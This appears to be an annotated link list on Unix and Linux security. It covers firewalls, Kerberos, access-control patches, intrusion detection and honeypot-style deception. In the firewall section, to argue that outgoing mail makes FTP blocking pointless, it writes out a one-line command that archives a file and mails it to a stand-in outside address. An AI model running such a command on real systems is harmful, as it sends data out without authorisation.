Fundamentally, there are security problems with Unix-based systems because:
Securing computer systems is a nontrivial task, and
Unix systems do get challenged when they are used for applications needing security.
People do not (or at least should not) use PC operating systems like MS-DOS or Windows 95 for applications that require information security, as they are extremely insecure for such purposes. (They have never been officially rated, but would fall into the "D" level were there certifications for that level.) Microsoft is not a vendor of secure operating systems, even at their best. Windows NT is only secure for such purposes (e.g. "C2 Certified") if:
You run the particular Compaq or Digital hardware models specified by NIST,
You run the particular version of Windows NT (3.50, I believe) specified by NIST,
You remove the floppy drive from the computer, and
You remove network connectivity, and
You configure Windows NT as specified by NIST.
Windows NT is largely useless for anything other than a network server, and thus removal of network connectivity makes it useless.
You can secure virtually any computer if you encase it in lead and concrete and place it at the bottom of the ocean. The computer is not likely to be too useful under such conditions, though.
A more recent security evaluation has been done; it may be best understood by making reference to Understanding the Windows EAL4 Evaluation which tells us:
Security experts have been saying for years that the security of the Windows family of products is hopelessly inadequate. Now there is a rigorous government certification confirming this.
ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist
tcpd secures and monitors incoming service requests, providing a security layer wrapped around the network services defined in /etc/services. Accesses may be logged, permitted, denied, or redirected, all in a fashion transparent to the outside user.
Network Associates: Vendors of TIS Firewall Toolkit
Trusted Internet Systems provides a freely usable (but not GNUed) set of tools for building firewalls. The design approach uses trustable components so that correctness can be verified both at the component level and at the "whole system" level. The source code must be reviewable by the security team in order to verify that there are no "trap doors."
There's enough flexibility in the TIS tools that security can be made restrictive ("fascist") when necessary and more permissive where appropriate. There's little sense in forbidding outgoing FTP connections, for instance, if outgoing mail is permitted: a user who wants to send data outside (and has mail access) can always turn it into email and mail it out:
echo 'filename' | cpio -o | uuencode filename.cpio | mail -s 'security breach' badguy@outside.com
SafeTP - Uses cryptographic connection negotiation to provide a secure alternative interoperable with FTP
Particularly directed to clarify terms used in the context of information security. Its definition of the word hacker is quite interesting.
A pretty decent introduction to security-related terminology.
Harris Computer Systems Corporation CX/SX Version 6.1.1 B1 Rating
Note that: "CX/SX is designed to be software compatible with CX/UX while adding additional security features. CX/SX provides the traditional Unix user-specified access controls of protection bits for discretionary access control."
VTun Virtual Tunnels over TCP/IP
If you want a secure network connection from one spot to another, and can only use the insecure Internet, use this to route encrypted traffic from the host at one end to the host at the other end. The point of the exercise is to make the tunnel invisible to client machines on the LAN; they don't know that the "tunnel" is there...
A B3 secure OS which has a Multics-like security model, segmented demand paged VM, and a multi-layer ring structure isolation mechanism. It provides a Unix API; an upcoming version is planned to provide a Linux-compatible API.
Kerberos is a distributed authentication system originally developed at MIT. It allows users and services to authenticate themselves to one another. It uses strong cryptography to transmit authentication tickets that allow users to assert their identities in an unequivocal manner to services in order to gain access.
Once the user logs in, and is authenticated by some scheme (password or otherwise), they can then request "tickets" for access to some service from an authentication server, which can then be submitted to the service to establish access permission.
Tickets have a limited lifetime; they may be used for an extended period of time, thus limiting the number of "ticket requests" that have to be made, but since the time is limited, a nefarious interloper does not have an unlimited time in which they might attempt to use a "stolen ticket."
A number of pieces of network-related software running on Unix are "Kerberized"; this means that you may (perhaps optionally) authenticate access using Kerberos rather than via the traditional "UserID/Password" combination. This commonly includes telnet, the Unix "rlogin" tool suite, and X11. Some commercial software, including SAP R/3, can use Kerberos as the authentication protocol.
A number of vendors sell libraries to integrate Kerberos authentication support into Unix and Windows applications.
There are parallels between the use of Kerberos and that of SSL; there is a useful comparison here.
Designing an Authentication System: A Dialogue in Four Scenes
This essay explains the Kerberos protocol in "plain English".
Most of the design work associated with this will deal with the user tools (including packaging tools like RPM or dpkg), as it is useless to have sophisticated security components without sufficiently powerful tools to manage it...
Including a fairly decent two page Quick Reference Guide...
POSIX Access Control Lists (ACLs) for Linux
This is an effort to implement POSIX-like Access Control Lists for Linux.
This project takes an approach similar to the Novell Netware notion of trustees. Trustees are bound to files/directories, and are used to grant/deny access to groups of users.
RSBAC is mostly a big patch for current Linux kernels. It is based on the Generalized Framework for Access Control (GFAC) by Abrams and LaPadula and provides a flexible system of access control based on several modules.
All security relevant system calls are extended by security enforcement code. This code calls the central decision component, which in turn calls all active decision modules and generates a combined decision. This decision is then enforced by the system call extensions.
A general goal of RSBAC is to some day reach Orange Book (TCSEC) B1 level; many special problems have been, and will have to be, addressed to get there.
Linux-Privs - Adding VMS-like Capabilities/Privileges to Linux
Maximum Linux Security: A Hacker's Guide to Protecting Your Linux Server and Workstation
A discussion of security tips:
With the thought to simply slow down an attack, here are some more things that can be put to good use:
-- Randall Raemon
FreeVSD - Virtual Server Daemon
FreeVSD enables many 'Linux platforms' on a single physical server, each identical to the main Linux directory structure; each Virtual Server has its own IP address and view of the process table, allowing web servers and other applications to be deployed and administered discretely, without compromise to security.
VXE - Virtual eXecuting Environment
VXE (Virtual eXecuting Environment) protects Unix servers from intruders, hacker attacks from network and so on. It protects software subsystems, such as: SMTP, POP, HTTP and any other subsystem, already installed on the server.
A VXE description (VXED) is a small LISP program (a set of functions) that uses a declarative description of the acceptable parameters for different system calls. The VXED is loaded into the kernel and controls the system call parameters of the specified subsystem. VXEDs are thus dynamically loadable modules, handled by a small LISP interpreter inserted into the kernel. In the current VXE version this is vxelisp, derived from RefLisp; vxelisp has a new internal bigstring representation and a full set of string and bit functions. The kernel version of vxelisp is reentrant, so that it can handle different VXEDs simultaneously.
Yahoo - National Security Agency Selects Secure Computing to Provide Type Enforcement on Linux
This is effectively an outgrowth of the Flask security architecture, continuing the efforts of the Distributed Trusted Operating System (DTOS) Project.
Sentry is a program that protects computers running Linux from various break-in attempts and assaults. It does this by dropping the IP addresses of the attackers into the computer's /etc/hosts.deny file when it detects a port scan.
To detect a port scan, Sentry binds itself to various ports that are not in use and are specified by the sentry.conf file in one's /etc directory.
When an attacker performs a scan on one of these ports, they are immediately added to the hosts.deny file and then dropped via tcp wrappers onto a dead, non-existent host like 333.444.555.666.
Sentry has proven extremely effective against assaults. To give anecdotal evidence, a friend of mine who runs linux and uses sentry has now accumulated a 2 megabyte hosts.deny file.
Amongst other measures, I run portsentry, and have a sizable list of blocked hosts.
Using deception to counter security attacks. Essentially, leaving apparent vulnerabilities to catch would-be attackers off-guard, lulling them into a false sense of security in your apparent insecurity.
You might, for instance, create a fake service 25 for Sendmail that makes it appear that you're running a terribly insecure version, whilst reality is that you are toying with the attacker, collecting information on them.
One cute idea they have is to have a pseudo-Sendmail tie up spam producers; if a request comes in from a known spam producer, you might accept the connection, and respond with a stream such as
250-This is Sendmail version 8.8.5
Note that this is not an attack; it is only initiated if they decide to connect to your server.
It is a bit of a paradox to slow down Internet connections in order to use them better, but at least is an entertaining paradox...
Linux Intrusion Detection System
A patch which enhances the kernel's security
lokkit - Firewall Configuration tool for GNOME by Alan Cox
Providing a hopefully-tidy way of getting at information about:
Security advisories
Articles on security
Maker of Pitbull, a secure platform certified at the B1 level, which presently runs atop Solaris, and which will soon run atop Linux.
oss.sgi.com - B1 Sample Source Code
This source code provides a sample implementation of a B1 rated trusted system.
The code has been extracted from the Trusted Irix product and provides an implementation of Mandatory Access Control (MAC), Capabilities, Access Control Lists (ACLs), an Audit Trail and supporting networking code, such as netinet, netstat, nfs.
SUBTERFUGUE is a framework for observing and playing with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect." Written using Python.
LOMAC is a security enhancement for Linux that uses Low Water-Mark Mandatory Access Control to protect the integrity of processes and data from viruses, Trojan horses, malicious remote users, and compromised root daemons. LOMAC is implemented as a loadable kernel module - no kernel recompilations or changes to existing applications are required. Although some features and fixes remain to be implemented, LOMAC presently provides sufficient protection to thwart script-kiddies, and is stable enough for everyday use.
Generating a random password:
head -c 6 /dev/random | mmencode
This takes the interesting approach of running some OS kernel like Linux, getting it up and running far enough to run some firewall configuration with ipchains and the likes, and then halting all of userspace. In essence... shutdown -h now.
The kernel stays running, in a "runlevel 0" mode, and passes through network traffic as configured by ipchains, but there are no services running that could conceivably get "hacked."
Data Hiding and Forensics on Linux
A discussion about when file data really goes away on Linux, and of how you might:
Recover data that appears to be gone;
Try to ensure that data that you think has been deleted is truly no longer available on disk.
SASL - Simple Authentication and Security Layer
A method for adding authentication support to connection-oriented protocols. It can manage authentication using a variety of existing mechanisms, including Kerberos. A natural extension is to also use some encryption scheme such as AES or Blowfish to encrypt transmissions.
Projects using SASL include IMAP servers, LDAP servers, with others likely in the future.
Configuring an IPSec Tunnel Between a Linux PC with the VPN 3000 Client and VPN 3000 Concentrator
GNOME client for Nessus security tool
A dynamic variation on IPSEC
ENTROPY stands for Emerging Network To Reduce Orwellian Potency Yield